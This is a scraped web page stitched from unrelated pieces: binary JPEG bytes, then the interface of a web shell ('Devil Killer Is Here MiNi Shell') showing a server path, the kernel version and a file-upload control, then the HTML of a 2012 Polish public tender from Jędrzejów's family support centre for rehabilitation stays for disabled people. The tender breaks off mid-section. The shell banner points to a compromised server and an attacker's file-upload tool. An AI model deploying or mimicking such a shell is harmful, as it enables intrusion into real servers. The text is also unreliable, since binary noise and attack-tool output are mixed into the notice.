JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120425/132512-N-2012.html

<p class="kh_header"><b>Jędrzejów: Organizacja turnusów: usprawniająco-rekreacyjnego w Zakopanem z warsztatami z psychologiem, szkoleniem z doradcą zawodowym oraz prelekcją i pokazem z zakresu udzielania pierwszej pomocy przedmedycznej oraz usprawniająco-rekreacyjnego w Ciechocinku z kursem bukieciarsko-florystycznym</b><br>
<b>Numer ogłoszenia: 132512 - 2012; data zamieszczenia: 25.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Okrzei 49b, 28-300 Jędrzejów, woj. świętokrzyskie, tel. 41 38 636 00, faks 41 38 636 00.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja turnusów: usprawniająco-rekreacyjnego w Zakopanem z warsztatami z psychologiem, szkoleniem z doradcą zawodowym oraz prelekcją i pokazem z zakresu udzielania pierwszej pomocy przedmedycznej oraz usprawniająco-rekreacyjnego w Ciechocinku z kursem bukieciarsko-florystycznym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie podzielono na 2 części.
Część 1 (dla 29 niepełnosprawnych intelektualnie uczestników Warsztatu Terapii Zajęciowej        w Mnichowie wraz z 12 opiekunami)
turnus rehabilitacyjny usprawniająco-rekreacyjny w Zakopanem z warsztatami                     z psychologiem, szkoleniem z doradcą zawodowym oraz prelekcją wraz z pokazem z zakresu udzielania pierwszej pomocy przedmedycznej
Stacjonarny turnus usprawniająco-rekreacyjny przeznaczony jest dla osób niepełnosprawnych: 
- z dysfunkcją narządu ruchu, również poruszających się na wózkach inwalidzkich (1 osoba), 
- z dysfunkcją narządu wzroku, 
- z upośledzeniem umysłowym, 
- z chorobą psychiczną, 
- z epilepsją, 
- ze schorzeniami układu krążenia,
- ze schorzeniami laryngologicznymi, zaburzeniami głosu, mowy i słuchu,
- z chorobami neurologicznymi
skierowanych na turnus przez lekarzy, pod opieką których się znajdują. 
W turnusie uczestniczyć będzie 29 osób niepełnosprawnych intelektualnie wraz z towarzyszącymi im opiekunami w liczbie 12 osób, tj. łącznie 41 osób. 
Czas trwania turnusu: 14 dni pobytowych, w terminie 23.06.2012r. - 06.07.2012r. 
Zamówienie obejmuje transport uczestników i ich opiekunów z wyznaczonego miejsca w Mnichowie, do miejsca odbycia turnusu i z miejsca odbycia turnusu po jego zakończeniu, do Mnichowa. 
Miejsce odbywania turnusu: Zakopane.
W ramach pobytu na turnusie należy przeprowadzić: 
Warsztaty  z psychologiem; w 2 grupach po 16 godzin lekcyjnych (nie więcej niż 4 godziny zegarowe dziennie dla każdej grupy).
Szkolenie z doradcą zawodowym, w 2 grupach po 8 godzin zegarowych (nie więcej niż 4 godziny dziennie dla każdej grupy).
Prelekcja wraz z pokazem z zakresu udzielania pierwszej pomocy przedmedycznej, w 2 grupach po 3 godziny lekcyjne.

Część 2 (dla 9 amazonek)
turnus rehabilitacyjny usprawniająco-rekreacyjny w Ciechocinku z kursem bukieciarsko-florystycznym
Stacjonarny turnus usprawniająco-rekreacyjny przeznaczony jest dla grupy 9 kobiet w wieku aktywności zawodowej, zagrożonych wykluczeniem społecznym z powodu niepełnosprawności:
po mastektomii
z dysfunkcją narządu ruchu,
ze schorzeniami układu krążenia
 skierowanych na turnus przez lekarzy, pod opieką których się znajdują. 
W turnusie uczestniczyć będzie 9 osób niepełnosprawnych.. 
Czas trwania turnusu: 14 dni pobytowych, w terminie 19.05.2012r. - 02.06.2012r. 
Zamówienie obejmuje transport uczestników z wyznaczonego miejsca w Sędziszowie i Jędrzejowie do miejsca odbycia turnusu (trasa: Sędziszów - Jędrzejów - Ciechocinek) i z miejsca odbycia turnusu po jego zakończeniu, do Jędrzejowa i Sędziszowa (trasa: Ciechocinek - Jędrzejów - Sędziszów). 
Miejsce odbywania turnusu: Ciechocinek. W ramach pobytu na turnusie należy przeprowadzić: 
Kurs bukieciarz-florysta, łącznie 30 godzin lekcyjnych, w tym zajęcia teoretyczne  i praktyczne na materiale florystycznym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje wykonanie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy w wysokości 50% polegające na powtórzeniu zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.14.00.00-2, 85.31.25.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 06.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć: 
- oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp,
-zaświadczenie o posiadaniu uprawnienia do organizowania turnusów rehabilitacyjnych (OR) potwierdzone wpisem do rejestru prowadzonego przez właściwego wojewodę, zgodnie z przepisami rozporządzenia, o którym mowa w pkt III.5., z terminem ważności wpisu co najmniej do dnia 30 lipca 2012r.,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie  oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy przedłożyć;
- oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp,
-  zaświadczenie o dysponowaniu ośrodkiem, w którym mogą się odbywać turnusy rehabilitacyjne (OD) wpisanym do rejestru właściwego wojewody zgodnie z przepisami Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007r. w sprawie turnusów rehabilitacyjnych (Dz. U. nr 230, poz. 1694) z terminem ważności wpisu co najmniej do dnia 30 lipca 2012r., tj. prowadzenie własnego ośrodka lub uzyskanie zapewnienia ze strony uprawnionego podmiotu prowadzącego taki ośrodek      o gotowości udostępnienia go Wykonawcy w celu odbycia turnusu rehabilitacyjnego, w terminie wskazanym przez niego w ofercie;
 - Ośrodek/ki musi spełniać warunki dostępności wymagane dla osób niepełnosprawnych uczestniczących    w turnusie, określone w § 15 ust. 1 pkt 4 lit. a) i e) rozporządzenia Ministra Pracy i Polityki Społecznej        z dnia 15 listopada 2007r. w sprawie turnusów rehabilitacyjnych (Dz.U. Nr 230, poz. 1694), posiadać bazę żywieniową (stołówka) i noclegową ( pokoje 2-4 osobowe z pełnym węzłem sanitarnym - wc, prysznic lub wanna, umywalka, telewizorem i czajnikiem elektrycznym; zaplecze techniczne i lokalowe do realizacji 
programów turnusów oraz aktywnych form rehabilitacji (sale zabiegowe, urządzenia do ćwiczeń, urządzenia do rehabilitacji, sale do zajęć), dysponować zapleczem do realizacji zajęć kulturalno-oświatowych, dysponować zapleczem rekreacyjno -wypoczynkowym, 
- Opis ośrodka, w którym ma odbyć się turnus rehabilitacyjny pod kątem jego wyposażenia i zaplecza technicznego do rehabilitacji osób niepełnosprawnych wraz z pisemnym zapewnieniem podmiotu prowadzącego ośrodek o gotowości udostępnienia go Wykonawcy w celu odbycia turnusu rehabilitacyjnego, w terminie wskazanym przez Zamawiającego lub umowę przedwstępną z takim podmiotem - jeżeli Wykonawca nie prowadzi własnego ośrodka</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć; 
- oświadczenie z art. 22 ust. 1 ustawy o spełnieniu warunków podmiotowych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć; 
- oświadczenie z art. 22 ust. 1 ustawy o spełnieniu warunków podmiotowych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy na skutek zmian technicznych i organizacyjnych, spowodowanych następującymi okolicznościami: 
- zmiana miejsca organizacji turnusu wskazanego w ofercie tylko w przypadku klęski żywiołowej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatjedrzejow.pl ścieżka dostępu: zamówienia publiczne-Jednostki organizacyjne powiatu-usługi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie
 ul. Okrzei 49 B
 28-300 Jędrzejów
godziny pracy: od poniedziałku do piątku w godzinach od 7:30 do 15:30 
tel./fax. 41 38 636 00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2012 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie
 ul. Okrzei 49 B
 28-300 Jędrzejów
godziny pracy: od poniedziałku do piątku w godzinach od 7:30 do 15:30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Tytuł projektu Dobry Start realizowany w ramach Programu Operacyjnego Kapitał Ludzki, 
Priorytet VII, Promocja integracji społecznej
Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji,
Poddziałanie 7.1.2. Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie
oraz środków PEFRON.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1 (dla 29 niepełnosprawnych intelektualnie uczestników Warsztatu Terapii Zajęciowej  w Mnichowie wraz z 12 opiekunami)
turnus rehabilitacyjny usprawniająco-rekreacyjny w Zakopanem z warsztatami z psychologiem, szkoleniem z doradcą zawodowym oraz prelekcją wraz z pokazem z zakresu udzielania pierwszej pomocy przedmedycznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stacjonarny turnus usprawniająco-rekreacyjny przeznaczony jest dla osób niepełnosprawnych: 
- z dysfunkcją narządu ruchu, również poruszających się na wózkach inwalidzkich (1 osoba), 
- z dysfunkcją narządu wzroku, 
- z upośledzeniem umysłowym, 
- z chorobą psychiczną, 
- z epilepsją, 
- ze schorzeniami układu krążenia,
- ze schorzeniami laryngologicznymi, zaburzeniami głosu, mowy i słuchu,
- z chorobami neurologicznymi
skierowanych na turnus przez lekarzy, pod opieką których się znajdują. 
W turnusie uczestniczyć będzie 29 osób niepełnosprawnych intelektualnie wraz z towarzyszącymi im opiekunami w liczbie 12 osób, tj. łącznie 41 osób. 
Czas trwania turnusu: 14 dni pobytowych, w terminie 23.06.2012r. - 06.07.2012r. 
Zamówienie obejmuje transport uczestników i ich opiekunów z wyznaczonego miejsca w Mnichowie, do miejsca odbycia turnusu i z miejsca odbycia turnusu po jego zakończeniu, do Mnichowa. 
Miejsce odbywania turnusu: Zakopane - ośrodek wpisany do rejestru właściwego wojewody, zgodnie          z przepisami rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007r. w sprawie turnusów rehabilitacyjnych (Dz.U. Nr 230, poz. 1694), przystosowany do realizacji turnusów rehabilitacyjnych dla osób niepełnosprawnych.
Wykonawca zagwarantuje pobyt w ośrodku w budynku, w którym będą zlokalizowane pomieszczenia sypialne, do rehabilitacji i zajęć warsztatowych oraz szkolenia. Dopuszcza się lokalizację gabinetów do rehabilitacji w innym budynku jeżeli odległość pomiędzy tymi budynkami nie przekroczy 150 m. 
Baza zabiegowa ośrodka winna obejmować minimum:
- inhalacje indywidualne, 
- magnetoterapia,
- laseroterapia,
- krioterapia miejscowa,
- elektroterapia,
- terapia ultradźwiękowa,
- fototerapia,
- masaż.
Wymogi o charakterze ogólnym : 
- Po zakończeniu turnusu Wykonawca przedstawia Zamawiającemu informację o jego przebiegu. Informację, sporządzoną odrębnie dla każdego uczestnika turnusu, należy przedłożyć w siedzibie Zamawiającego w nieprzekraczalnym terminie 21 dni od daty zakończenia turnusu. Wzór informacji określa załącznik nr 7 do rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007r. w sprawie turnusów rehabilitacyjnych (Dz.U. Nr 230, poz. 1694). 
- Wykonawca po zakończeniu turnusu rehabilitacyjnego przedstawi Zamawiającemu rozliczenie za każdego uczestnika zgodnie z § 8 ust. 8 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007r. w sprawie turnusów rehabilitacyjnych (Dz.U. Nr 230, poz. 1694). 
- Wykonawca obowiązany jest przechowywać dokumentację dotyczącą turnusu określoną w § 12 ust. 1 pkt 10 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007r. w sprawie turnusów rehabilitacyjnych (Dz.U. Nr 230, poz. 1694) oraz spełnić inne, nie wymienione wyżej wymagania, jakie wynikają dla organizatorów turnusów z przepisów tego rozporządzenia. 
- Wykonawca zobowiązuje się do oznakowania miejsc, w których korzystać będą uczestnicy turnusu poprzez umieszczenie plakatów informacyjnych dotyczących projektu, które otrzyma od Zamawiającego po podpisaniu umowy.
Wykonawca w ramach zaoferowanej ceny zapewni uczestnikom: 
- przewóz z wyznaczonego miejsca w Mnichowie do miejsca odbywania turnusu oraz z miejsca turnusu rehabilitacyjnego po jego zakończeniu, do Mnichowa, autokarem z klimatyzacją o ilości miejsc odpowiedniej dla uczestników turnusu (tj. nie mniejszej niż 41), należy przystosować jedno miejsce do przewozu osoby na wózku, autokar musi być nie starszy niż 5 lat. 
- zakwaterowanie w ośrodku w pokojach 2-4 osobowych z pełnym węzłem sanitarnym (wc, prysznic lub wanna, umywalka), telewizorem i czajnikiem elektrycznym.
- całodzienne wyżywienie obejmujące co najmniej śniadanie, obiad i kolację oraz suchy prowiant w drodze powrotnej z turnusu. Suchy prowiant musi odpowiadać 75% wartości stawki dziennej wyżywienia na każdego uczestnika. 
- pełną realizację opracowanych i złożonych u właściwego wojewody programów turnusów odpowiednich ze względu na ich rodzaj oraz rodzaje niepełnosprawności albo schorzenia lub dysfunkcje uczestników, 
- zaplecze techniczne, użytkowe, socjalne umożliwiające realizację programów turnusów ( sale zabiegowe, urządzenia do ćwiczeń, urządzenia do rehabilitacji, sale do zajęć), 
- baza zabiegowa ośrodka winna obejmować minimum: inhalacje indywidualne, magnetoterapia, laseroterapia, krioterapia miejscowa, elektroterapia, terapia ultradźwiękowa, fototerapia, masaż.
- fachową kadrę gwarantującą prawidłową realizację programu turnusu z warsztatami z psychologiem, szkoleniem z doradcą zawodowym oraz prelekcją i pokazem z zakresu udzielania pierwszej pomocy przedmedycznej, w skład której wchodzą w szczególności: kierownik odpowiedzialny za przebieg turnusu, pielęgniarka, specjalista do rehabilitacji ruchowej, pedagog lub inna osoba posiadająca przygotowanie pedagogiczne,  psycholog oraz doradca zawodowy. 
- stałą opiekę pielęgniarską i możliwość korzystania z opieki lekarskiej podczas turnusu, 
- badanie lekarskie na początku i na końcu turnusu, 
- co najmniej dwa zabiegi rehabilitacyjne dziennie (20 zabiegów w trakcie turnusu na osobę zarówno dla osoby niepełnosprawnej jak i opiekuna), 
- przygotowanie i realizację programu kulturalno-oświatowego
Wszystkie koszty związane z przygotowaniem i realizacją powyższego programu kulturalno-oświatowego (np. autokar, przewodnik, bilety wstępu i inne) po stronie Wykonawcy. 
 - ubezpieczenie od następstw nieszczęśliwych wypadków w czasie podróży i trwania turnusu, 
- pokrycie kosztów opłaty klimatycznej. 

- w ramach pobytu na turnusie należy przeprowadzić: 

Warsztaty  z psychologiem;

KOMUNIKACJA INTERPERSONALNA 
Budowanie poczucia bezpieczeństwa w grupie, analiza czynników sprzyjających byciu otwartym w relacjach interpersonalnych; - ćwiczenia: serce dzwonu, zwężanie kręgu analiza; - otwartość - dyskusja, próba ustalenia wspólnej definicji; 
ćwiczenia: bank pytań, gorące krzesło - analiza; 
Ocena własnego sposobu odnoszenia się do innych - na podstawie skali Johnsona, praca indywidualna,       w parach i na tle grupy; - pytanie do każdego - ćwiczenie; 
Pogłębianie samoświadomości - lista przymiotników, które mnie określają - ćwiczenie; 
ćwiczenia: moje mocne i słabe strony; 
Definicja grupy - elementy składowe: cele, normy, struktura; 
Diagnoza własnego funkcjonowania w grupie na podstawie kwestionariusza - praca indywidualna, w parach i na tle grupy; ćwiczenia 
TRENING ASERTYWNOŚCI 
Mapa asertywności. 
Obrona swoich praw (granic) w sytuacjach społecznych. 
Oceny - krytyka i pochwały: 
warsztat techniki konstruktywnego reagowania na różne formy krytyki i ataku. 
Wyrażanie:
- uczuć pozytywnych 
- uczuć negatywnych. 
- Osobistych opinii i przekonań. 
- Stanowienie swoich praw. 
GRUPOWA DYSKUSJA PODSUMOWUJĄCA TRENING. 
Diagnoza poziomu satysfakcji uczestników zajęć z własnego funkcjonowania podczas warsztatów- dyskusja; 
Informacje zwrotne - ćwiczenie obszary do dalszej pracy - ćwiczenie; -list od grupy - ćwiczenie; 

Warsztaty należy przeprowadzić w 2 grupach po 16 godzin lekcyjnych (nie więcej niż 4 godziny zegarowe dziennie dla każdej grupy).
Prowadzący: psycholog posiadający wykształcenie wyższe psychologiczne i uprawnienia pedagogiczne, min 3 letnie doświadczenie w prowadzeniu szkoleń z w/w zakresu oraz doświadczenie w pracy z osobami niepełnosprawnymi.

Szkolenie z doradcą zawodowym
1) zakres:
- zagadnienia rynku pracy,
      - umiejętność aktywnego poszukiwania pracy,
- przygotowanie dokumentów aplikacyjnych,
- rozwijanie umiejętności interpersonalnych,
- przygotowanie do rozmowy z pracodawcą,
- prowadzenie rozmowy z pracodawcą,
2) prowadzący - doradca zawodowy,
3) materiały dla słuchaczy na własność: teczka, długopis, zeszyt,
Warsztaty należy przeprowadzić w 2 grupach po 8 godzin zegarowych (nie więcej niż 4 godziny dziennie dla każdej grupy).
Prowadzący: doradca zawodowy posiadający wykształcenie wyższe, kwalifikacje doradcy zawodowego        i min. 3 letnie doświadczenie w prowadzeniu szkoleń z w/w zakresu oraz doświadczenie w pracy z osobami niepełnosprawnymi.

Prelekcja wraz z pokazem z zakresu udzielania pierwszej pomocy przedmedycznej.
Program prelekcji:
